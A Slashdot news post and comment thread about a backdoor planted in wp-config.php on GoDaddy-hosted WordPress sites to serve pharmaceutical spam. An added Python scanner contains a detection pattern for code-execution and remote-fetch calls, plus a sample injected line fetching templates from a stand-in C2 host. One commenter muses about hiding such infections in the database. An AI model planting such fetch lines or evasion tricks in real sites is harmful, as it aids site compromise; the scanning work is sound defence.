Hundreds of GoDaddy-Hosted Sites Backdoored In a Single Day (bleepingcomputer.com)

Internet security analysts have spotted a spike in backdoor infections on WordPress websites hosted on GoDaddy's Managed WordPress service, all featuring an identical backdoor payload. The case affects internet service resellers such as MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress. BleepingComputer reports: The discovery comes from Wordfence, whose team first observed the malicious activity on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy. The backdoor infecting all sites is a 2015 Google search SEO-poisoning tool implanted on the wp-config.php to fetch spam link templates from the C2 that are used to inject malicious pages into search results. The campaign uses predominately pharmaceutical spam templates, served to visitors of the compromised websites instead of the actual content.

The goal of these templates is likely to entice the victims to make purchases of fake products, losing money and payment details to the threat actors. Additionally, the actors can harm a website's reputation by altering its content and making the breach evident, but this doesn't seem to be the actors' aim at this time. The intrusion vector hasn't been determined, so while this looks suspiciously close to a supply chain attack, it hasn't been confirmed. [...] In any case, if your website is hosted on GoDaddy's Managed WordPress platform, make sure to scan your wp-config.php file to locate potential backdoor injections. Wordfence also reminds admins that while removing the backdoor should be the first step, removing spam search engine results should also be a priority.
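The wp-config.php check the summary recommends, as an added example that is not code from Wordfence, BleepingComputer or GoDaddy: a Python allowlist scan that flags any line that is not a stock statement, or that calls a code-execution, decoding or remote-fetch function. The allowlist patterns, the function list, the names `scan_wp_config` and `strip_comments`, and the sample file are assumptions constructed for illustration; the actual payload is not reproduced.

```python
import re

# Strings are matched first so comment-like characters inside salts survive.
TOKEN = re.compile(
    r"""('(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")|(/\*.*?\*/|//[^\n]*|#[^\n]*)""", re.S)
# Values a stock define() takes: a literal, or the ABSPATH directory expression.
VALUE = (r"(?:'(?:\\.|[^'\\])*'|(?i:true|false)|\d+|"
         r"(?:__DIR__|dirname\(\s*__FILE__\s*\))\s*\.\s*'/')")
# Statement shapes of a stock wp-config.php (assumed; host additions get flagged).
ALLOWED = [re.compile(p) for p in (
    r"^<\?php$", r"^\?>$", r"^\}$",
    r"^define\(\s*'[A-Z0-9_]+'\s*,\s*" + VALUE + r"\s*\);$",
    r"^\$table_prefix\s*=\s*'[A-Za-z0-9_]+';$",
    r"^if\s*\(\s*!\s*defined\(\s*'ABSPATH'\s*\)\s*\)\s*\{?$",
    r"^require_once\s*\(?\s*ABSPATH\s*\.\s*'wp-settings\.php'\s*\)?;$",
)]
# Calls a config file has no reason to make: execution, decoding, remote fetch.
RISKY = re.compile(
    r"\b(eval|assert|create_function|base64_decode|gzinflate|str_rot13|"
    r"file_get_contents|curl_exec|fsockopen)\s*\(", re.I)

def strip_comments(src):
    """Blank out PHP comments, keeping string literals and line numbers."""
    return TOKEN.sub(lambda m: m.group(1) or "\n" * m.group(2).count("\n"), src)

def scan_wp_config(src):
    """Return (line_no, kind, code) for every line that needs manual review."""
    findings = []
    for n, line in enumerate(strip_comments(src).splitlines(), 1):
        code = line.strip()
        if code and RISKY.search(code):
            findings.append((n, "risky-call", code[:80]))
        elif code and not any(p.match(code) for p in ALLOWED):
            findings.append((n, "unexpected-statement", code[:80]))
    return findings

# Constructed sample; line 5 is an invented injected line, not the real payload.
SAMPLE = r"""<?php
define( 'DB_NAME', 'example' ); // constructed value
define( 'AUTH_KEY', 'k#9//x/*y' );
$table_prefix = 'wp_';
$t = @file_get_contents( 'https://c2.example.invalid/tpl' ); /* injected */
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    print(scan_wp_config(SAMPLE))
```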

  • by joshuark ( 6549270 ) on Thursday March 17, 2022 @09:16PM (#62367711)

    Now it goes...from GoDaddy to "Whoa daddy!" with this development.

    JoshK.

  • Wordpress can be secure if you know what you're doing. Trust the professionals.

    Oh, wait!

  • by anonymouscoward52236 ( 6163996 ) on Thursday March 17, 2022 @09:21PM (#62367723)

    This wasn't a bug, it was a feature. GoDaddy sucks!

  • Now on pornhub!

    • Came here for this comment. Err, I mean I opened the thread hoping this would pop up. What I mean is, I hope they don’t have a hard time fixing the problem in the end.

      Never mind.

    • while wearing a t-shirt that says "backdoor guests are best"

  • They've mismanaged my domains in the past, and just this month stopped my email forwarding on my domain because of a "past due balance" of $0.00. Forwarding was restored when I paid them exactly $0.00. Of course I have to go through the checkout process first, and didn't even need to submit a card for payment. BTW, they didn't send an email to tell me about this, I just noticed I did not get an email I was expecting, and did a test send.

    Great customer service, NOT!
    (Apologies to Wayne Campbell. Party on!)

  • None of the brands you named are resellers. They're wholly owned subsidiaries of GoDaddy.

  • Years ago, I made a website for someone. I coded it as I intended it to work, not like whatever weed the Wordpress developer wanted it to, and everyone's happy.

    Years later, I was just perusing through the code, and I see garbage in essentially every script.

    But the website was working perfectly well

    Upon digging, I found out the host was compromised, and every script in every single account was infected with some malware that would only "work" with Wordpress.

    Every malicious account got deleted. Mine

    • by King_TJ ( 85913 )

      Well ... if everyone started using YOUR custom coded solutions instead, the same thing would have happened eventually with your code. :)

      I mean, seriously though -- it should always give you more secure and efficient code when you write a purpose-built solution for a web site, vs using one of these frameworks like WordPress and customizing it to meet your needs.

      The problem is, that severely restricts people's ability to spin up a site they need without having the developer talent (or money to pay them to bui

  • "Go Daddy" and "Backdoor"

    Contents not what expected.

    Honestly, that's a relief.

  • Apparently I'm pulling my company out of GoDaddy just in time.

    After years of having to call up GoDaddy support once every 4 to 6 months because our website would suddenly "disappear" from the web, they abandoned the courtesy email accounts that were bundled with their hosting plans and forced their customers onto Microsoft 365 for email and calendaring. That adversely affected our business for several days and would eventually cost us a lot of money for something that, when we first opened our account, was

  • This exact attack occurred twice, early in 2020, and again 11/2020 on my personal Web site that has been around for over 20 years but which I only lately hosted on GoDaddy. Worse, my content is strictly old-school plain static HTML, and the hackery injected PHP scripts in various new files while leaving all my genuine content alone. So there is no reason for this injection to have worked, except that the GoDaddy server had activated a PHP feature which I never asked for or used.

    Worse still, the hack was

  • Aside from injecting some PHP code, why not make db changes as well? Surely a bit harder for most people to detect and especially clean up.
    Good time to leave GoDaddy for sure though - if they aren't keeping up with WordPress patching, they probably aren't doing too great with OS patching either.
